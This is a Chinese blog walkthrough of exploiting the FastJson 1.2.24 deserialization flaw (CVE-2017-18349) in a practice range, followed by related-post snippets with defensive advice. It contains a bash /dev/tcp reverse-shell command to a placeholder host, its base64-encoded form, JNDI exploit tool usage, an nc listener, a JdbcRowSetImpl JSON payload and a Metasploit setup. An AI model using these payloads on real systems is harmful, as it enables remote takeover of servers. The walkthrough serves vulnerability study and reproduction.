FastJson远程代码执行漏洞基于JNDI反弹shell使用

置顶 已于 2022-10-13 15:45:40 修改
阅读量6.2k 收藏 7
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 安全测试 文章标签: 安全 web安全
于 2022-10-13 13:34:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hapenl/article/details/127299130
本文介绍如何利用FastJson组件1.2.24及之前的版本存在的远程代码执行漏洞(CVE-2017-18349)进行反弹Shell攻击。通过JNDI注入方式,演示了设置反弹Shell命令、使用JNDI注入工具、构造恶意Payload以及最终成功获取目标主机Shell的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

基础知识:

漏洞利用的两种方式:

靶场环境说明

反弹shell准备

反弹shell执行

在FastJson组件1.2.24及之前版本存在远程代码执行漏洞(CVE-2017-18349)。

基础知识:

Fastjson是阿里巴巴公司开发的一个Java语言编写的高性能的JSON处理器。它采用一种“假定有序快速匹配”的算法,号称是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。它提供两个主要接口toJSONString()和 parseObject()进行序列化和反序列化。

漏洞利用的两种方式:

基于Templateslmpl

基于JNDI

本文从JNDI的注入方式来实现反弹shell。

靶场环境说明

通过burpsuite可以抓到提交的报文:

 在Repeater处修改str的值可以进行注入验证

反弹shell准备

1、设计一个shell命令,如下,更新vps的IP以及端口

bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/port 0>&1

这里需要注意shell命令里不要空格或换行指令,在>&后面不要有空格。否则反弹shell的时候命令执行会报异常退出。

通过base64的bash加密,通过多种格式在线加密解密 - ASCII\十进制\十六进制\二进制在线转换工具可简单实现shell命令的base64加密。

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvcG9ydCAwPiYx}|{base64,-d}|{bash,-i}

2、下载JNDI注入工具,建立rmi、ldap服务

JNDI-Injection-Exploit工具下载路径:GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)

JNDI介绍:

JNDI注入利用工具,生成JNDI链接并启动后端相关服务,可用于 Fastjson、Jackson等相关漏洞的验证。

JNDI注入利用工具使用:

可执行程序为jar包,在命令行中运行以下命令:

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

其中:

  • -C - 远程class文件中要执行的命令。

    (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator.app")

  • -A - 服务器地址,可以是IP地址或者域名。

    (可选项 , 默认地址是第一个网卡地址)

注意:

  • 要确保 109913898180端口可用,不被其他程序占用。如果只希望RMISERVER的话,就只要开放1099端口。

    或者你也可以在run.ServerStart类26~28行更改默认端口。

  • 命令会被作为参数传入Runtime.getRuntime().exec()

    所以需要确保命令传入exec()方法可执行。

    bash等可在shell直接执行的相关命令需要加双引号,比如说 java -jar JNDI.jar -C "bash -c ..."

示例:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "command" -A "ip-address"

 3、启动JNDI注入工具,获得rmi服务或ldap服务的链接

4、通过nc启动监听步骤1中的端口,如下图

nc -lvvp [port]

5、fastJson反序列化漏洞的注入payload

{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/731tna","autoCommit":true}}

rmi这一段的值为JNDI注入工具生成的链接。

 准备好以上后,返回burpSuite里通过Repeater来触发shell。

反弹shell执行

在burpsuite中的Repeater触发注入的payload

 发送payload,在JNDI启动的服务监听中就可以获取到触发的结果,在nc的监听中可以看见反弹shell成功。

 以上就是基于JNDI注入的反弹shell使用。

Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5646
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
FastJson远程命令执行漏洞学习笔记
m0_73257876的博客
09-04 782
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误,请大家批评指正!
Fastjson反序列化漏洞复现
m0_46371267的博客
09-29 1529
Fastjson反序列化漏洞复现
Fastjson反序列化漏洞原理与防护指南
2302_81945070的博客
05-29 1632
Fastjson漏洞 = 快递员太老实 + 说明书有毒只要升级版本、关闭危险功能,就能像拒绝陌生快递一样保护服务器安全
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 2246
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
fastjson远程命令执行
m0_52920608的博客
09-16 714
fastjson远程命令执行 vulhub复现
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
03-08 3405
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
fastjson1.2.47远程代码执行&JNDI漏洞利用工具
归零者的博客
06-23 1131
Fastjson是一种Java库,用于处理JSON数据。它提供了一种简单高效的方式,用于将Java对象序列化为JSON,以及将JSON反序列化为Java对象。Fastjson以其高速和低内存消耗而闻名,因此在Java应用中广泛应用于JSON的序列化和反序列化。它支持各种功能,如JSON解析、序列化、反序列化以及对JSON数据的操作。Fastjson被广泛应用于Web应用、移动应用和其他基于Java的系统中,用于处理JSON数据。
Fastjson反序列化漏洞原理及漏洞复现
weixin_46263525的博客
04-04 1987
Fastjson反序列化漏洞原理及反弹shell利用
Log4j2 远程代码执行漏洞(CVE-2021-44228)
qq_68163788的博客
06-18 1606
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228是Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
[阿一网络安全] fastjson 代码执行(CNVD-2019-22238)
Ayixy的博客
08-22 497
漏洞原理:漏洞利⽤FastJson autotype处理Json对象的时候,未对@type字段进⾏完整的安全性验证,攻击者可以传⼊危险类,并调⽤危险类连接远程RMI主机,通过其中的恶意类执⾏代码。攻击者通过这种⽅式可以实现远程代码执⾏漏洞,获取服务器敏感信息,甚⾄可以利⽤此漏洞进⼀步的对服务器数据进⾏操作。攻击流程:制作反弹Payload -> 开启HTTP服务 -> 启动LDAP服务 -> 监听EXP中端⼝ -> 执⾏Payload开启靶场,靶场成功运行。
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击
Fastjson反序列化漏洞
wutiangui的博客
09-08 510
使用AutoType功能进行序列化的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。2、存在漏洞的靶机对json反序列化时候,会加载执行我们构造的恶意信息(访问rmi服务器),靶机服务器就会向rmi服务器请求待执行的命令。
Fastjson 1.2.47反序列化远程代码执行(CNVD-2019-22238)
Long___Xiao的博客
02-28 615
如果这些特定方法中存在可被恶意利用的逻辑(通常被称为“Gadget”),那么攻击者就可能利用这些逻辑执行恶意代码,从而导致严重的安全问题。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。“dataSourceName”: “ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}”,
fastjson 远程代码执行漏洞(HTTP_Java静态调用_java.lang.Runtime_远程代码执行)
Tastill的博客
08-21 1328
今天公司代码安全测试提出来一个问题:HTTP_Java静态调用_java.lang.Runtime_远程代码执行! 百度查询资料,发现是fastjson架包的安全漏洞问题,在com.alibaba.fastjson原来使用的是1.1.42版本的! 我升级到了1.2.30,测试发现确实解决了该问题! <dependency> <groupId>...
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 1309
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
fastjson远程代码执行漏洞
网安君的博客
03-29 5879
Fastjson 1.2.24 远程代码执行漏洞 漏洞说明 FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 前提条件 开启autotype 影响范围 fastjson 1.2.22-1.2.24 jdk 1.7,1.8版本 漏洞复现 由于Fastj
Fastjson 又出高危漏洞,可远程执行代码!
Java技术栈,分享最主流的Java技术
06-01 1538
来源:安全客 www.anquanke.com/post/id/207029 0x01 漏洞背景 2020年05月28日, 360CERT监测发现业内安全厂商发布了 Fastjson 远程代码执行漏洞的风险通告,漏洞等级:高危 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 Fastjson存在远程代码执行漏洞,autotype开关的限制可以被绕过,链式的反序列化攻击者精心.
Fastjson远程命令执行漏洞总结
weixin_52501704的博客
07-27 1397
将json字符串转化为json对象在net.sf.json中是这么做的//将json字符串转换为json对象在fastjson中是这么做的//将json字符串转换为json对象// Reference需要传入三个参数(className,factory,factoryLocation)// 第一个参数随意填写即可,第二个参数填写我们http服务下的类名,第三个参数填写我们的远程地址// ReferenceWrapper包裹Reference类,使其能够通过RMI进行远程访问。
fastjson反弹shell
最新发布
06-14
### Fastjson 反弹 Shell 漏洞利用及防御 #### 1. 漏洞背景 Fastjson 是阿里巴巴开源的一款高性能 JSON 解析库,广泛应用于 Java 项目中。然而,由于其对反序列化功能的支持,Fastjson 在多个版本中存在严重的反序列化漏洞,攻击者可以通过构造恶意的 JSON 数据实现远程代码执行(RCE)。其中,Fastjson 1.2.24 版本及以下版本被爆出 CVE-2017-18349 漏洞[^2]。 #### 2. 漏洞原理 Fastjson 的反序列化机制允许通过 `@type` 字段指定对象类型,并动态加载对应的类。如果未对 `autoTypeSupport` 属性进行限制,攻击者可以构造恶意的 JSON 数据,加载任意类并调用其方法。例如,`com.sun.rowset.JdbcRowSetImpl` 类可以通过 JNDI 注入连接到恶意 RMI 或 LDAP 服务,从而下载并执行恶意代码[^4]。 #### 3. 利用过程 以下是一个典型的利用流程: 1. **构造恶意 JSON 数据** 攻击者需要构造一个包含 `@type` 字段的 JSON 数据,指定目标类为 `com.sun.rowset.JdbcRowSetImpl`,并通过 `dataSourceName` 字段指向恶意 RMI 或 LDAP 服务。例如: ```json { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://<attacker_ip>:<port>/Exploit", "autoCommit": true } ``` 2. **设置恶意 RMI/LDAP 服务** 攻击者需要在本地启动 RMI 或 LDAP 服务,提供一个恶意类文件。当目标系统尝试加载该类时,恶意代码将被执行。以下是使用 Metasploit 启动 RMI 服务的示例: ```bash use exploit/multi/misc/java_rmi_server set PAYLOAD java/meterpreter/reverse_tcp set LHOST <attacker_ip> set LPORT <port> run ``` 3. **发送恶意请求** 使用工具如 Burp Suite 抓取目标系统的 HTTP 请求,修改请求体为上述恶意 JSON 数据,并发送给目标服务器。如果目标系统使用Fastjson 且版本低于 1.2.41,则会触发漏洞,执行恶意代码。 #### 4. 防御措施 为了防止 Fastjson 反序列化漏洞被利用,可以采取以下防御措施: 1. **升级 Fastjson 版本** 升级到最新版本(>= 1.2.68),阿里团队已修复多个已知漏洞,并改进了黑名单和白名单机制。 2. **禁用 `autoType` 功能** 将 `autoTypeSupport` 属性设置为 `false`,禁止动态加载类。例如: ```java JSON.parseObject(jsonStr, Feature.DisableAutoType); ``` 3. **使用白名单机制** 配置 Fastjson 的白名单,仅允许解析特定的类。例如: ```java ParserConfig.getGlobalInstance().addAccept("com.example."); ``` 4. **输入验证** 对用户输入的 JSON 数据进行严格验证,确保不包含恶意字段(如 `@type`)。 5. **监控与日志记录** 部署入侵检测系统(IDS)和安全信息与事件管理系统(SIEM),实时监控异常行为并记录相关日志。 #### 5. 示例代码 以下是一个简单的 Fastjson 配置示例,展示如何禁用 `autoType` 功能: ```java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; public class FastjsonExample { public static void main(String[] args) { String jsonStr = "{ \"name\": \"test\" }"; try { // 禁用 autoType JSON.parseObject(jsonStr, Feature.DisableAutoType); System.out.println("JSON 解析成功"); } catch (Exception e) { System.out.println("JSON 解析失败: " + e.getMessage()); } } } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值